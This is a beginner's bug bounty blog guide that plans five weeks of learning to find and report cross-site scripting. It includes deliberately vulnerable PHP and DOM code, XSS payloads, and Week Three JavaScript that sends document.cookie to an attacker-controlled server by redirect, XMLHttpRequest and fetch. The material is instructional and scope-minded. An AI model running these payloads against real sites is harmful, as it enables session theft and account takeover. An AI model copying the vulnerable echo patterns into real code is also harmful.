Bug bounties. Five Weeks To Your First Bug


~ 7 minute read
Crafted : 6 months ago Updated : 5 months ago
Tags:
#guide #xss #fiveweekstofirstbugchallenge #bugbounty #beginner #stayhome

Hello luves, 

This post is a mirror of my Five Weeks To Your First Bug challenge, a mini series on getting into bug bounty hunting. This guide aims to help absolute beginners.

 


 

 

Introduction

What does it really take?

Becoming a bug bounty hunter is a relatively straightforward process: open your favorite terminal and execute this.

$ make me a BugHunter

 

Unfortunately, that's not the case. Doing bug bounties is hard labor. It is results based, and when you are a beginner there is a high chance of duplicate bugs, meaning someone else found the same bug before you. That means you make $0 for a lot of work!

But hey! Don't give up hope yet; this guide is all about reporting your very first vulnerability in 5 weeks! You have to spend 3 hours per day, so it will take you ~100 hours. This guide only focuses on finding your first cross-site scripting vulnerability. Why cross-site scripting? Because it's the most common vulnerability, and it's easy to exploit.

 

How to begin?

 

This guide assumes you have basic computer, software, and info-sec skills. You at least know, theoretically, what a vulnerability and an exploit are. And most importantly, you have a curiosity that drives you nuts to know more.

Besides time, which is the most critical factor, you have to clear your head and change your mindset from making quick cash to learning, and then practicing what you've learned.

 

Due to their nature, bug bounties aren't for everyone. The likelihood of burnout and imposter syndrome is higher than in many other tech jobs.

The best way to prevent these issues is by taking baby steps. Don't force yourself to get results; relax, sit back, and enjoy the journey.

 

 

 

What really is a bug bounty?

A bug bounty program is a deal offered by many websites, organisations and software developers by which individuals can receive recognition and compensation[1] for reporting bugs, especially those pertaining to security exploits and vulnerabilities.

These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organisations, including Mozilla,[2][3] Facebook,[4] Yahoo!,[5] Google,[6] Reddit,[7] Square,[8] Microsoft,[9][10] and the Internet bug bounty.[11]

Well said, wiki. In straightforward words, you will join your favorite team as a freelance security researcher. But you will only get paid if you find an issue with a security impact.

Now, if you have what it takes and you are determined to walk this path, let us begin!

 

Week One: Preparation And Recon

 

The first week is all about preparation. You can google for bug bounty platforms and find one you like. Here are a few popular ones.

 

Open these sites and read their docs and rules to get familiar with the platform itself. Next, head over to the program directory on each and check which software you would enjoy working on; is there any program in the list whose product you already use as a user? That can help you significantly. Also register an account on your chosen platform. Be aware that some programs offer money and some don't; those that are not paying are easier targets for sharpening your skills and reporting your first valid vulnerability.

 

Read:

Watch:

Practice:

  • Try to find as many assets (sub-domains, URLs, etc.) as possible that belong to the target you've chosen.

 

By the end of this week, you should be able to use Burp Suite for intercepting HTTP and HTTPS traffic, and you should have a better understanding of the recon process.

 

 

Week Two: Understanding Cross-site Scripting

 

Cross-site scripting is by far the most common issue to be found. It can be dead simple or mind-blowingly complex. The whole idea of a cross-site scripting attack is injecting JavaScript code into the client's browser, where it executes. It is far more powerful than popping an alert; in many cases it can lead to full account takeover. This issue is the very first issue you'll find. The easiest variant is reflected XSS. The basic idea is that the program trusts user input and reflects it back to the user. To illustrate the idea, here is a simple piece of code written in PHP.

 

<?php
$xss = $_GET['XSS']; // user input, fully attacker controlled
echo $xss; // vulnerable: no sanitisation, the raw value lands in the HTML response
echo htmlentities($xss, ENT_QUOTES); // not vulnerable: < > & " ' are encoded before output
?>

 

Next is stored cross-site scripting. The only difference from the reflected one is that the data is stored in some database and later shown to users. Here is what the code at the backend looks like.

 
...
$sql = "SELECT title FROM user WHERE id = 10"; // imagine the stored title is <script>alert(0)</script>
$result = $conn->query($sql);
$row = $result->fetch_assoc();
echo $row['title']; // vulnerable: reflects <script>alert(0)</script> to every user who views it
...

So in this case we used the following string as our title.

<script>alert(0)</script>

 

By the end of this week, you should be able to find and exploit reflected and stored XSS vulnerabilities! Good job already! You are unstoppable!

 

Week Three: Exploiting Cross-Site-Scripting issues

Now that you have learned how to find reflected XSS, it's time to exploit your first vulnerability as well. It's not easy to say how to exploit these issues because it really depends on the target, but usually you want to steal session cookies. Session cookies are used to identify users on the backend, so if you can steal them you can steal the target's identity, which makes this bug very serious. Once you are able to run arbitrary JavaScript code, here are some ways you can steal session cookies.

 

// We usually use JavaScript to exploit cross-site scripting

// this is where the cookies live (cookies flagged HttpOnly are not exposed here)
document.cookie

// we want to send these cookies to a server we control

// First way: redirect the user to our server
document.location = 'http://127.0.0.1/cookiestealer.php?c=' + document.cookie;

// Classic XMLHttpRequest, available in all browsers
var request = new XMLHttpRequest();
request.open("GET", "http://127.0.0.1:8000/?c=" + document.cookie, true);
request.send();

// One-liner on modern browsers
fetch("http://127.0.0.1:8000/?c=" + document.cookie);

 

 

Remember, it's just JavaScript code, so you can get creative here. If you are not familiar with JavaScript at all, don't worry; resources are just below.

Read:

Watch:

Practice:

At the end of this week, you should understand the basics of JavaScript and be able to write cookie-stealing proofs of concept.

 

Week Four: DOM-based cross-site scripting

 

Alright, now you are more comfortable with reading and writing the necessary JavaScript. You can use your newly learned knowledge not only to exploit cross-site scripting issues but also to find a new variant of XSS called DOM XSS. Imagine you found the following code while reading your target's JavaScript.

//let's say here is the code located at http://127.0.0.1/xss.html

var pos=document.URL.indexOf("xss=")+4;
document.write(document.URL.substring(pos,document.URL.length));

This can be exploited simply by opening:

http://127.0.0.1/xss.html#xss=<script>alert(document.cookie)</script>

What? It's that simple: the JavaScript takes everything in the URL after the # sign, skipping four characters to exclude "xss=", and then writes it into the page using document.write().

 

So this is very similar to our backend example, but it lives in client-side code. The impact is as high as the previous one, and it can be exploited like the past issues.
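As an added example (not from the original post), the DOM sink above is modelled as two functions: one that mirrors the vulnerable snippet and one that reads the fragment with the URL API and inserts the value as a text node, so the browser never parses it as markup. The `doc` argument is assumed to be `document` in a browser; passing it in lets the logic be exercised outside one as well, and the function names are my own.

```javascript
// Vulnerable: mirrors the page's snippet. Everything after "xss=" in the URL,
// fragment included, is handed to document.write(), which parses it as HTML.
// (If "xss=" is absent, indexOf returns -1 and the URL from offset 3 is written.)
function renderXssParamVulnerable(doc, url) {
  const pos = url.indexOf("xss=") + 4;
  const html = url.substring(pos, url.length);
  doc.write(html); // HTML sink: markup in `html` is parsed and executed
  return html;
}

// Hardened: parse the fragment as key/value pairs and insert the value as a
// text node. A text node is a data sink, not an HTML sink, so
// <script>alert(document.cookie)</script> is shown as literal text.
function renderXssParamSafe(doc, url) {
  const hash = new URL(url).hash.replace(/^#/, "");
  const value = new URLSearchParams(hash).get("xss") || "";
  doc.body.appendChild(doc.createTextNode(value));
  return value;
}

// In a real page the hardened version would be wired up like this; `document`
// only exists in a browser, so this is skipped elsewhere.
if (typeof document !== "undefined") {
  renderXssParamSafe(document, document.URL);
}
```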

Watch:

Practice:

By the end of this week you should be able to find and exploit simple DOM-based XSS vulnerabilities.

 

Week Five: Exploiting Real-World Targets

 

We are facing a sad pandemic nowadays. If you are in quarantine, you can use your extra time to report your first issue.

Stay focused. Don't even try to learn about other issues; focus only on XSS. If you are tempted to wander, imagine you have not learned anything else yet until you submit your first valid XSS issue. Cut out all the noise and juicy information around you and focus only on cross-site scripting.

 

Alright, you made it this far; now it's time to put your recently gained knowledge to work. Let's say you choose to work on the "AWESOME" program because you love "AWESOME" tools! Go to their program page on your chosen bug bounty platform. Read the scope carefully, make sure every single item you are testing is in the scope of the bug bounty program, and make sure XSS bugs are accepted (they are in 99% of programs). Now look at each application you found in scope, try to explore as much as you can, and try to find as many endpoints as possible. Read the JavaScript and try to trace the user input. Try to inject your code into forms and files.

This week you practice everything you learned on your target. If you started with a paid program and can't find anything, move on to another target that offers swag and points. Your end goal here is to find and report your first "valid" XSS vulnerability; it can be DOM-based, stored, or reflected.

Read:

Use:

 

 

Conclusion

There are so many vulnerability types, which makes it very hard to create a series like this for each of them, but you now already have a working methodology for dealing with new issues: spend some time learning and practicing the issue, then take your gained knowledge and test real-world targets.

I can't wait to hear that you've found and reported your first XSS vulnerability. If you have done it, contact me!

 

#FiveWeeksToFirstBountyChallenge
